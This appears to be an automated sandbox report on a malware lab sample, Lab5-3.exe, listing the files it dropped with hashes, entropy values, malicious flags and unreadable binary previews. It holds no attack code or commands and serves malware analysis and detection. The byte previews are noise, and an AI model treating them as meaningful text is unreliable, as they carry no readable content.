                                                                                                          SSDEEP:96:igaCN7fNShcaKsqZndttXorGx0uKeY2ElUJ:iM7fmcaKddPB0Cb
                                                                                                          MD5:14F12C0A8A50DF096202B7C9221D5DAC
                                                                                                          SHA1:ADAB03C761BCF0B8AA61EFD840C7C29A900F1D16
                                                                                                          SHA-256:DA412FB183D3765B9C59E5E48A45D16EDF407252A0074A49F2D5F9906A971F9A
                                                                                                          SHA-512:CD86301A21D0ED20CFE25EE72F2B2D3C08B8148C2E9968154DA5619144709AE8BC568D8D695CCC40758EA76FDA486DA1E31F5203B4D55CE7E7890D2C93E1F157
                                                                                                          Malicious:false
                                                                                                          Preview:.;v...L.+..~......l.EA,.;Q)..m......$t6.E.5.`TA.......:.L.b..r......'.2..D.....(.K.S..K..V...."..5.<T.q..t....:.R..6.](....O)y......#^.W..Y..;c......FF.#l.......{`.......Vt..M.ZYu..U....%...K:=..B...z.L.L/...-2.P..5FI...O..e.4.uog.a....zo.L..l.w#o...|xC.Si... .K..c..~..R.$.h..F.E...*..H..U/..Gp.j....#...M ..U.PK."R...S...y_....c.....kf....e...K.......Q...}TQS.h..;.}P.q.......-q..^.@..q5/o.%.d-..i.7c..h..`.\.k+...aK._.mg.dj.# .!6b2..!W.r.G.sV....u.rP:.`..P..sz..`...........z........~.......gB...N...B..t.6...K.o"w.........u......(.z;.|V...?.e.&..b....5.9.3."[.2.].+....c._..F.#..Wn/..e.3.d.......'j....R...4.6W.c=]..A......%t}...Y..[NyB~.zGF...B[.T.R......}.+).g\.P...x..iQ.pg.b.R.....{.2....A.v.bbB]..8...~.Yd .]A,.=.....F$...T.;........X....% .m..iT....l..l....I..6/.0.z.@.{.j....&.|_...._......?-.BV..'..v .cK...Xi.-.....}&.yP..X....R..i.u...U3hY.O_\..@G...1.{/.&{D#'.S>....&b:).Hr..X..I..8OT.....X.{...y|.7...-.=)."7.$I.`.7.~.p{.%.hZ.|"in
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3120
                                                                                                          Entropy (8bit):7.943891871410353
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:c6XSBLU0CTXflTCE28cNwGx0uKeY2ElUJ:Em0uNTm8cND0Cb
                                                                                                          MD5:6F759C0587221574D864A77C41A61374
                                                                                                          SHA1:39C7E119FB6783745F98164416B6A9BE91C4B558
                                                                                                          SHA-256:7D38F607DD1ECD9E572F09E11F5FE82FF9D33731D895D32851068D0D8396F58B
                                                                                                          SHA-512:44598B72ECFE09C7278699AF1F05CF3C48A5E4D39A3DBEF3FCA90FE2DAD4ACB1A110E00B0B22D09C812CD40A032D56DE0D79D49BAA62581650E7C489C22B6E87
                                                                                                          Malicious:false
                                                                                                          Preview:'Y..y).0..6...............u...1...g..Y -9.4Nk.vm.R..|.P.fr..._|....wo..O.......WO.kn.b..F?'...L.J...*h....YX..d....bd..9q.x..]..(2T*}............x.V...k..X z.|.p."F,U.4.5.7..j..JpB..C..q .{....f....u..^....2s.g3...[.d.c.~|[.<........C.$..n%.o.]+.....b..9.C...:G>....t~8.8+........PM..{l...........Ch..L....W.(Q.B.x...05..T.\.....g'.-6.q2XMf..gi...A2(c..Q..,.4.@.d3.,fj...j..9....qQ...+Z..:.._.IC..G...'.MHN.8..R.MT,6.Rd^)..".".1....q.zE{......N*zm.Ouh.../...........N.AO...0..&$}.L.p....J.....P>..F....S*.."f.c0.w........,g.@.j.^...`...<.v.....%...Ps...j..g..)}P......r.t..#k...q.aG..|.*W..vA..d=..d.@....Vhf.L..LsrI.;V.X(.....F..,k`.a.<...]V...`Q3./......;+e..&.;..-..u.$..%..i..........~.N....f.:.?z..}i.om.....es.i625.w.)\.,..q..j.+...<.....;...x.v,.@$.B......Z..W.C.....z3A....i|....>.......f.........-.n]^D.g.;.c>.@.?..I.._...2.l.5.\..&.RO.TY3CH.d..c....R.DA..N)\}.u...1..!.^_..e.W6..W.e\...<Pe.{A. ?4..^v."......D;G.S....b.0]....=7=.&.B.@..X\....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2496
                                                                                                          Entropy (8bit):7.907808931121357
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uoo0weD0v5lhXa4s/pIE+skmQvAv98XHfUTid3hBaUoSGFcmeykEdEElU92i:hOeDUTa4G+IQvSGx0uKeY2ElUJ
                                                                                                          MD5:C052303B6C81E85816FDED7B3B377DF2
                                                                                                          SHA1:79F4960D0E7DCEB39ADB97DB1B615CBF3336B52F
                                                                                                          SHA-256:6A7818A75BAA2C91F2A369FAA12F72CF25A5FA70425007AF24216336B7ED1893
                                                                                                          SHA-512:03147F08002399F7B7707A4F768E62CE62129405F4F722F88B031D2E42BA715C3FE17293DA73C7A0828F2EF7A38B3E68639B0029E10223D6E2C167F6DE31CF89
                                                                                                          Malicious:false
                                                                                                          Preview:.`.W...}%..29tVA.3..~...|P......&.4..=.;...W...F}.M..(.g.{....Nr....E.....{.|2KY.-..F...(#s......9.......B..;...M.5D..n...+\.v*.a...J.K.x..'......q..V..M.jd=...f.vw.KX..^.KD...\..L}.'M$%..+:2,......Z..;?.8L.r..4...%....<L9...].xJ...5.2.0......Qb.....h......'.q/J-...........0....Q..[.gm..L6*&.%....ul...Mz..%L....h..f...x.I...K7^..x..FV.=.o..i.....".c.c.N...W...l$..BTK.Bl.+TE..b..B.....X.E..uE.NV...!M...U.....E.^..L....3..`.6.....S..v.I.&w..Df..."...h......d...l".!...u*J....9.Q(..Z.5>......JD%...wl8.k.g.(.P].....&.DW.p..6U..H..T.g.........n...AR.hm...1b.J`z.>....d.........\dm..f....u....D..?..O.0.h.....\.?.H.....vd-..wK.,...........Z.X...C...y.go.DWu.....x!..g...6..:.n..^..b0......3.B...(,M...m.9d. e..ScP..[...c.w....(q...oJH.XK.t.>.;.L...lvU].u8.v.i...w...../......+>J....P.9.....2I-...A.>...)....N&8.7.....d._.....=.m....ZS....~L0..<....m.N.(.?@YiJ||>........>.M....m.Vg3....&.I}D.a@..F(..fB.....h...]..Q.N..@.G..z..];..s..-v.C.e....?
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.914110791491254
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9Eo2uZaQpH/R44uRzO4MWeHfUTid3hBaUoSGFcmeykEdEElU92i:2uZDpHZGD5xGx0uKeY2ElUJ
                                                                                                          MD5:2F6C4DEAF7A0420AF13DF89E4827EDB8
                                                                                                          SHA1:571C881E90B2844FA2BAF82B0A6BFB91A1975388
                                                                                                          SHA-256:3A86DB963BA884ECB44610402FC65EE610CE92D919A68BADAFEF689372F39AE2
                                                                                                          SHA-512:6CBD2EB17BD8E0355358B1209A3014BF9BB7497A1172CC8F842F1F21579964B2B824DCCC9E99AFB7B30B5F37DA09ED36CA48AD39E01562B5408472A07E5D7056
                                                                                                          Malicious:false
                                                                                                          Preview:.S\/....,|=$.4.mJZ..G..7...#LQ'+.T_).W.q...nQ]....!.....xp).~..<....g/.NkD!...SxNu..j0....@;.......k=..._.......H4uc.5..1~...... c1L....s_.C....T.S.=..$..*. ...L..s..="....~...........++..9....\......HFK..[.p~..3|.:.Irzr\R.^..jd..4.......m@U..)....i..D.r.Tx.'..3.....3..\n.d.S.7b..........?^..Z.x.......f..)...CgK../.Yh~..x....Pk=Q. .>@.V......|....8...........v.)./.......Y.....;..X.......b.I)../..U...X.`..k...hB1...XJ..<..[!t.........2....}O1.&X..<.'..BW....BW.....Q=..T..9.8..w.y.#.2.;...v.......K.T.6..;...MH...LrS.Qy....y..|zZ..L.9.@.......j..V5..i..$hs....)h.p.$.b.V0...N.w<..A.|..H.y&.,...,.^...*....S..5^l.:9*...`....<..h.(..M./..7~].l..@..&......B...w.."..H...UA..A..x.:..3Z...q.1._.i.C...C....c$.0qn..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.927647677591343
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2pYhgzXMUIyg2IF6Y5vbEtKjATTkYPwT6IfQWXHfUTid3hBaUoSGFcmeykEdEElk:GYhgzFIyg2IF6evIYAkIwTXQW8Gx0uKk
                                                                                                          MD5:E782EB37A572243BE6D48483F993F5DF
                                                                                                          SHA1:DAB988D11BD77F93EEA21F7780B6EAC22079E15D
                                                                                                          SHA-256:745AA2EEB0A487D99E5928909142B7ACB55A13D31787D0AC898854DC75760AA5
                                                                                                          SHA-512:0A44070F9C8106B36E0A46BF77D3FC04FD6BA3102BC1C9AC2FF735AC12C5A0E3B49F4AEED4D07E5D9B932D13BA1BEF1576D93F9631976EF5F9EF3E7AB2DC6D6B
                                                                                                          Malicious:false
                                                                                                          Preview:...yW?..|...c.}.BG...v....9>.d0.q. ....=.}'Mf....N....4eVT..u.p.`.dU..K...h..]...u.(..L....".x....h$.N.je>g...>.s.....}.2..KLc..a3...Q..........z..s..)......W,...u[..b..r/......}..Y..{f...<.f..............I.+.1U0......uW.0\.0.j.<I..f.$.7.V...Z.2. ....]...F..%...-............f.Wv.8....B..a...9@:oU$.........fi....^v*...f,x....t.Y:..L.5l.c...6Z...>O..lh.a..?..j..j$tA.._.8....._&..I5N.m..vX)=.9.w!.0..4y......Wp..&......4.(..a.....~^Urg$N...J.v7.M..U.....M.*..6.IS}EH....1..:&Y.F....h$..za....D4.K .Ox%~^.....i{.u...~.W(.._...#.%M.....Z..d0....tJ@..Y.=.EE..J..:.a>J...>g.'BO.....&......gl...[8e..?..^i7..g.YU...!~1..v........e.aO.q...t..).t...>.u..p.F.3."B.i...|.O..9...*.,..):5..U..l.zw...}.j.5y.&.N.x......n........).3.^X6I.N...8...C.5..YqMve........r:..D.z3M...*%.w.V!....&U....3t..{q...g.7......&-."......hu..`w...+.Hn..^..g.o....s..JHQ4/......,.=tWl......<...[..|.." 8...fn....V..*1.8...a.u0.....q.N...[|.8..n0.e..P}" .....".-.c....4..w....w...g;
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.941893459758299
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0aKqhELqho9d5eUp3VNLd2UT4LAjJHfUTid3hBaUoSGFcmeykEdEElU92i:Uqhiqqr9z208CKGx0uKeY2ElUJ
                                                                                                          MD5:603C99E59EC73A7DC9B98EB2E333FB6D
                                                                                                          SHA1:328EE25FED579E9EB5D59C05539E46C916CFB894
                                                                                                          SHA-256:D5802E4413BB640B2197FD8EFC25FC3E51A928C690796AA4C5DF4B2061308BA6
                                                                                                          SHA-512:6352A381A0236638144EE544D748A1039ECFAEE5524CC08FD983DE92FB2A8231CCA01D04CA1C9889F7FCCB199140747A11B88D96092A4498B0B035CA7C2E6343
                                                                                                          Malicious:false
                                                                                                          Preview:}p.O.k..s)Z.\...4..=O.......TBhB.W...;.!h..,>n...W...7.^tO-.......L....=N.T........F..kbd.d.Au....l..]....y...16.>.. ....k,.j.......6v2..E+..h.6a.....J.......y....]....%]..6.!...o...|...I....9k.$..."rZCt...Kv...|.(.0.Y.+r...AJ.3..9......O.X......@W`..9......~..3...).6..(.P.WI.E.'l.y....=n\...'2X_...8..Z.\j.:G4.c([...5..<4.)...U...y.f...l.E..JL'.e......I\.F.N.Q.C.=.L.-..=Y...R..C..D..|....-..</.B7.../G..k...U....Ar.x1...A]......0..>-.:.`.k4........ ...W-..qv...P...E)"yE.F-...........y...|!.-N5....,l!...o.T...S.c.9........8.y......\@..R...|..@S^)B..hp.w..j......q......jjnJ.h.=.LL....q....R..SH...|....LDhbp.[...:........=v...[..^.RE.D.U.".PxU...--..uy...o)....I.Gk68o.9Y.cX%.1.C...9\Y5......... ......xq.....'/=..M....m_...A.if1..N.E...\.*cX5.......no.}...O.$r.:.e-Y...6..s.7...vd>S.tq...DCHEaI.m.sK.YY..(..j.t@.4.....i=./..k.k.4..s)B...9.26..2.......r..5.....=.."....tu..5Z6.rC.........k....f.3..Y.k.H..B.F$. .obS..1..}9..q..&..I....k
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1728
                                                                                                          Entropy (8bit):7.8912065612189695
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Vb2B9D3HfUTid3hBaUoSGFcmeykEdEElU92i:Vbq9DcGx0uKeY2ElUJ
                                                                                                          MD5:676403781DC8104DE0CF825BB852AE6B
                                                                                                          SHA1:55CDDD84C41313159C06490490D48BF8360CD2A7
                                                                                                          SHA-256:C4C9594C3B01781D33049D2DA7BAF461509629EF7DE3FDA6EC0A5E6B52934EEE
                                                                                                          SHA-512:FA276280BDA7C280F45BBF8060160261C11933055B51586EF856569B0223BF4BB2A0C6FC77AC7B959582902CD632FBF44B481C0DE9CD5C94F3258F10A82B1D6F
                                                                                                          Malicious:false
                                                                                                          Preview:.R....00.0Yb.^O=)M.(.J..H$.I....&.Mo.H....'....F.....wI....W^h.pG..-..e..>.Q.t.h.k%..<.....K+..[..".AyB.................@?7.-3..]...e.I...Xc.CJ.`;.Z....M 7..\.k.jI.C.^MM'/.y..F.....v..ud~..j\.a.a.;X.7[Z*,..=.M.~.*;.|]..S.,.>rs..v$.~.=.d,..i...PI.~StLp+o...6@.}.7]7.Y.#...k...X..^..r...t.m..?...B.R...!Z.........F...lXX..aa...+x....0....y.. ..dR......Nd..X.._...n.#.3K.@r...d..E=E$.:.n...sV_..a.&&...!b9.......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10512
                                                                                                          Entropy (8bit):7.981720818428047
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:fOzXv3/SYwsZibDAxJLdLx2hwIid4GHWJTLCREnAiJAKwlcyuVD/60Cb:UYKJLMwIidJwgSJadQ6tb
                                                                                                          MD5:C79DF1331C9A22A4578CCB4A700F2203
                                                                                                          SHA1:A4F5591FC6AA891E9350F66421D75A9448558DAF
                                                                                                          SHA-256:1B9A5717BE20FB42C0459998224851EB3711418320AF54CE41F289CD30E06FB2
                                                                                                          SHA-512:1D7870509678C60905527D4BF177FB66ACCA8A429C1849E76BE344EEDC4127C89A2E983D9DB3DA7AEDB10C2912872F6861099EC7B3330F386F5D9945CCE6DB26
                                                                                                          Malicious:false
                                                                                                          Preview:J..q..|..j.C9C^;......I....OW4...r.(..m~..`.`9.....?.?.+....J./.........d...."...c. :..0...8m..]4..u...=.....H..{.k'..e0%jh....B........c../..b...p.i{.R..XS..p......g.R,l...s.x.....vyv5)jnX..5|.U......(42...t...(.....Y...Z..H.N.N?..Wmg.u....N..*5.u.8)|....Y^..[."........`.A.-)./y.].....|<.jz.R..,.|.6.a..1xs]?#.Y-.\@.n.o..b..H...D.c.k........i...l.M.D.q.+Y...A8a....}.|..0.....k..........c{..4....xA........lN.gN....?.Uk......rZ.R?QS.#... ......C....].nF...vd..D1...KDW..i..W.J.%..X4....`......~..S.7..q....@}ly8..}[QO.......,.>W..K.X.[..l.a..K..as2.|<.9A.,Q....9..l-&...Y..Wl.u....V..D...7...FR..Y...G;q.. .[.|N.1.@.....^\...*.A...5.b....N<.s..g.G......s.G.:......3../...#.......A.?m.}..'j...Q..6.z-k"....qW6.l"0r.....1...}v.......Gps.!....J2...Pq.q..>.a..^-...|.g<P.[#.:.,$%.I..h...X......jt.,&5..tE....l.Yp.3C.KM^......5....J..eb....|$.L...{.t'h.O..D........d.HXt.T."..]cg].\.R6.se!.'..%.].Av.A"...Y.s>.!. .1>...hB7V..C.K.j.>y..}...L."...}z....o
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20336
                                                                                                          Entropy (8bit):7.990952703225627
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:QdCC+OxKfW+OaH50wCHVIJkBXtfb4q89dL2nJqlDscp3DSCEtb:+C7RKwouYXGdL2MlDDp3eZ
                                                                                                          MD5:3496B29BA6E3E9094EFDB3A3FA7A2DFD
                                                                                                          SHA1:E3DCE8F63C003D8A2CEE5E06EAF97CB4BBABF9F7
                                                                                                          SHA-256:E1C78246CBF97287AEF4F7732922684B1F0BB8CA169AC17EBD3175B6319B5FA9
                                                                                                          SHA-512:3F54382CDFB456B49C587649F27ACC637B2F42DE7859304BC952A2C939E208D7849C5AD548D0C6DBB33D17461846A632B786A16AE48F0B91A19510702956FCE7
                                                                                                          Malicious:true
                                                                                                          Preview:..Z.H.v./..Tkg.]$1o.<.V.<Y8.8oD.bY.u(#......1%0.A...;.;.`.....np#~..N..^.1.b.D.,O.^.S<bo.Y9.9.K..`.$F.[....6>K...s...h... T.c.@..Q..v.s%...R.B....b.p?|S..;.g<...?...<FO...v.|..'l.=..wS9...b.L......I....{nv..0!|...[p.......5..6.q.c{@t..9.S.J...7`.z...g=d...w..j.....U.w..p.8.Y6.o........Nyx.Rb4...U....s.!Rm..P.......;Dy.O..Q'`.>2[..(tN..`..:......5.6.N......p....n1..S....._=.s.h.e..4..+....r.Z........bg..U..6\5.U......[-.P...<....\.(.!.f..[.X.D..yl...e.7.$..\H.....M...i.g......RUc..!. .."Cv.a..d#s}...53.u&xD..W.6.....~NFb...@..-QV..qh.4..3..y!B6.....H."6....Y3x=..4...6...P......1S1...8...).9@F.......E..e.6mj...yX..z[.}u.d....g.....6..l?@t.k.I.K.Q...1....l.'..T.sb..|.4.n....E.b.J.?.. .q~...B.....G.........[\...dhI..N&^'..p.i;u@/.UQa.x...JG.=.....l..n..zdm9..gHU<c...K..u..H(...\GH;..m.9c..v.....?G.d>...7..{}.f..?.8...f..rP..O.8.K..........b-V...A.L...Z.k6..^n3....Y1`.0.=...0..,..ucv..>8...xCU.O...%H...J.d.`.1.?..M.r...9.....a.....Z...-+..m.... ..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10736
                                                                                                          Entropy (8bit):7.985017474282671
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:pEttsTV7ByGdBxOZvtfzbE7wqojOnWqTnSIVLjV6wK10Cb:miVFbdBxOldiiCnlWRj1tb
                                                                                                          MD5:27BBC01520ED1050D547B0D568DCCF4F
                                                                                                          SHA1:B02848921D01E60EF29F6051F4B22D6D458CD990
                                                                                                          SHA-256:77D84F2F130C757154D15448E020EA9DE34FE85CB838D66220C66A71BBCD2FCE
                                                                                                          SHA-512:4BEFB3759D12DA22851A6005B33B5BC0A353DAFE7E1876D40F1EC5A4646D7756FB66A09470474E88DE5D7020134CFEE38E0A778C41D1E5F47ABC7AECAD0635A6
                                                                                                          Malicious:false
                                                                                                          Preview:..7.r4a......Qn..."c..(..J...i......4u........rn<W..q7e.D..w.../.V.>..h[h....W....&.,f2...s'N`.g...<.y34.Ig....UB=Ii._NB..1.(..............5....[)..].Q.a{".Y<....G...hT.=r4.X..U.w&..eO.}a{..$....8.,t.......Z_.t.5..@n.Y.....6.}..o..6T..+.......z..<......K*.....H.... ..Xa{p..Mn..(n ..@.C.[v...]H..Z.).O....m.....n...P.r...k..<....d.\*.:p..BD.A1n.>.{.4ihXv..>ks.i..c..r..T....>-./..o..z..l...b..6'9..>.V.gym......"i:....s....P..).4[.l..A..<..^._.A.Ri.......%.....90........TP.S.[._n.o..].yoqS...U3.`k.'^....,.^...LP.W...S.<v.d.....,....~ ...K0?~.x.[!...K..b...xL..4R.b..36F,..n...W\.x.t1..;...Y./.-~...C.o..m..._.A.+@.RfJ...s...v....0P.....hT.A..s........8.3..-.../.X^...Y......c.L]'.R.....2..v.m6....PX.F.3...!........k<....~9.Ts.b6sW.lb,......M..._.r>PlC..!.Rw...w.F...AAEH.>.~j...g...A....Y.(....7.....j2J........K..\...>.[..0o..J...Q.!F.K..u....v^]&..D....Y..:[P14.....9".....)U5.]%.?.../.....71...=q..L.9.......M.T.....q... `.FB.c....TK..6.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20800
                                                                                                          Entropy (8bit):7.992181273593471
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:bWvme65sNa3MMMnYZ0W8yr0Q1dwa3mFcMUUKQ42X5wAFpCTpVFtb:i+eqsITwhw7dw2mWMUqz6Azw9Z
                                                                                                          MD5:1EE64D4071B140002C94A468180E8442
                                                                                                          SHA1:2240287AB5C6EE140A1E037F5D3FC46247F0BCD4
                                                                                                          SHA-256:3E546930F011607F5FA4DF94B981F017E7BFD014B635B83B2900F4B690F9C085
                                                                                                          SHA-512:7453EED2377B5A2CBEBBB549E34E74EB0562C3D1297D73908FCC607F92ACB59D4A6273D3431346C4EE4894B2A322EBE52D3BE9CF857A32E0C2F2144EAB5E89AE
                                                                                                          Malicious:true
                                                                                                          Preview:3...J.....8,..9..0+..2.hT.J.B.......k.f..s.N.R..j...#.,..~..q...2.y'.....[.7b......T.l.}?.2:....>.Nv...~5........1r..a.,._C...f&..{.....].^...._.'...j...:....9..H.. .3.:f}]p".I..M.|L...@:s.(.:+d..D.*..=.~..8E.....#....w<#......Q.....A zpf,.U.[SS...h@b K.V.E.d..Q..j.o.j......=z>T...w..\.......-\?....5...........\...x.F.....w.*...3.'.[...j:.z..n.D#..*......j.~cb./!\*.fP.V..ys.....]Y.&....._o......8.I.2...MKK......o.....Q...".).R..g......A..4.Xc...]...Dc..D..2..h......5.....7....F.....#...~.....~..x...?.5s.#A.....Q#s...`..[.aGz..C.y.h\\.P.0g..67....;.6..S.W.+....../.M..%.....Y.0.-..v..9}..CW=....Z...#..b.N$...-.I...4L.%......k....Xa..N...>4..F.....f1.]\!.#.Z...........=...$^*...~2.dNX.5......../[.......ta;..5.d=O{.b.w...2|.. .F.Z..u...o........;.3.e.F...CO../F|......O..r.../.........r.q..pX.F.,...Ji.......Ew.bF.Z.jw....;+9R(..g..d..jG.Nd......Iz...l...QgN.T....R2M]......F!g%. 2M..@......X...Wn...s....I......Ff..T~t...w..} .".+.g..a
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.911748568496381
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:sZdCGVAdC422ci5ZPgSthHfUTid3hBaUoSGFcmeykEdEElU92i:sLCQ49hudGx0uKeY2ElUJ
                                                                                                          MD5:F68A903548E7FD4191855D23D62711A3
                                                                                                          SHA1:A22496FE3FD8DE0114BCB55483891146372FBC3B
                                                                                                          SHA-256:8AEB76F55D3335E0D007897AF59C2B2331981EA15BCA78F3E04E80F28003E85F
                                                                                                          SHA-512:BE1C5B66753AFCC67F1CAF7CED5CE3272CB77F565CB13CC79FEDBAE257F4809B95FA2A974592D12E21D84AE3438B35ADFAAF1DBDAF9BFC4056E725E5BD8AA712
                                                                                                          Malicious:false
                                                                                                          Preview:..=.'..;.J.RH....on..R....,......ClJ.Z.......W....x.s8......1@.D....wB#J.pm..].a...U.NZn5.-+.Kf95...Q+.r.w.../..]..|.]....!..... .mfuo.>v.p......'..+@!....Py_....|d....\.....v...D..g..1u..........4).t....=#Q..<..?JZ...E..2..b...]........t.......u..o-..;.Z:......`......p.U|}..y..XU...}|..|'Bm5..+...07D.......l.:x..j.S.*.I]i.aV{..C.(..*.j*..N...)[8;.........m.7...z.. ....~U!.....W;.VNL....L.,e.e.i...}...4.O..i......r.Ws.1.(.e...r.5...@.).:"}..lu.;% .$..W'.{..z.X....s.x..nX..u.....:...n.......]!.Fp.;.. ........EE...?:.c.m..kD.......N..M..Z.."'.t..Z.....=*M.(..t.y?....j.,p.(5h.!...]]..9e.?$..._m..L.....h...M..V.p...5.@Yw.................Am.=..A.=+|>mW..8;.m.j..S....R|z.Iu...i...0..{...40.7;6.....N..q..yw=.W...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.922312645827742
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2fs+g49OmLK592yrU1HfUTid3hBaUoSGFcmeykEdEElU92i:8sO9OxT2/OGx0uKeY2ElUJ
                                                                                                          MD5:D975C25A2FE242F4658AD997E845D526
                                                                                                          SHA1:ACE12FB516804F608B903C10B5B4AF4A3E31E997
                                                                                                          SHA-256:AB73B4E34746756CA2928ED201A06A7E0A7A585A0E216CFCB4F32C37F386B59B
                                                                                                          SHA-512:58E394D915E02AFEAAF1EA45453E98548C209B8C68A1880C2268B2F11C904EA44EF80F8388E5B7F989485335A6F647269B31E0845616D36D477E9111D40C5289
                                                                                                          Malicious:false
                                                                                                          Preview:... ....U\AK..h...d.@....VQ.O...XQ.Z"X..3).N.....?..l.s.i..d..E.J..Tz.hAh.#......U. Q7.U.$.......nK...g~c...=._*.....#....esh...F.........E...F.oev.U.M..<..>7.w..1.....N.1.uo..3!..j..U..dz..)Qac.s.[\...T..pPm.|DNN..xU]...._#......:BW]8.d^^!J.0Y..GS..>.5......f..;.Y..\.nrFR.G~.2}..5.X.uW@$...^.......5@..... .8(..`..5U..N:...d&.4+T?9I..m.7.v..X.....X#v.....Sb.B........cu.......YO 5....].3..\..)6....k.Lhz..Y...92.&..W.8m.!..z...1;dJq.........2.<"...9.)d\x\k....e.Y..m.GO..).41.r...K)Z...05..A......aBj.s8.j......>...|..?.r....c.]...FPQJ..e.....u..#.....E{T._..<u..V.Y.6N4.|.m...Ys._7=%..%.......KL7...+...l)of2...I.4z....5(......U.....z}_O.7..... n.Qs.y.y}lx'e.G....d.".=..B..h......r6.]..".X.p.?Q.;...fZ..b,......TqunD..70..@.4.:.8.....%./...$.9../.}..D...0.A.....@....Ij.t.:8....UE..............y.jL*36..T}CBW....G/Ce..e.d.9..K.E.L._B6........-RI*J.+/.wN&#..*.Vo.-`...@<........../(...G.\Cg...$G...@....i..~.WR...n...9..a#..*..w...Z.F.{....4
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6752
                                                                                                          Entropy (8bit):7.9757894312357145
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:WU28559Z2dDmoU59MUuV5YOzqgiEzSdppIHG6RtQqAG31OmGumQawiWa28Gx0uKk:p2sUdios+UInGgiEzSqm8tQqeEYs0Cb
                                                                                                          MD5:F325F6E00F960A07BC9D08FEA79B22E8
                                                                                                          SHA1:0A0C90EBEDA3409B3C5347EF829FC87F2C586D70
                                                                                                          SHA-256:A597648DFEB123DD3C4F9305EAE3F07B676B9A14ED56AEDE95F8CB8DB5096B56
                                                                                                          SHA-512:018563F67934978C39429D1D748697D279E8E9ECF7D8562188815AFD59933457DC92F58FD92BBC8A8953FB0751FF5419A000E8C04EEE9B8876894BB78A613008
                                                                                                          Malicious:false
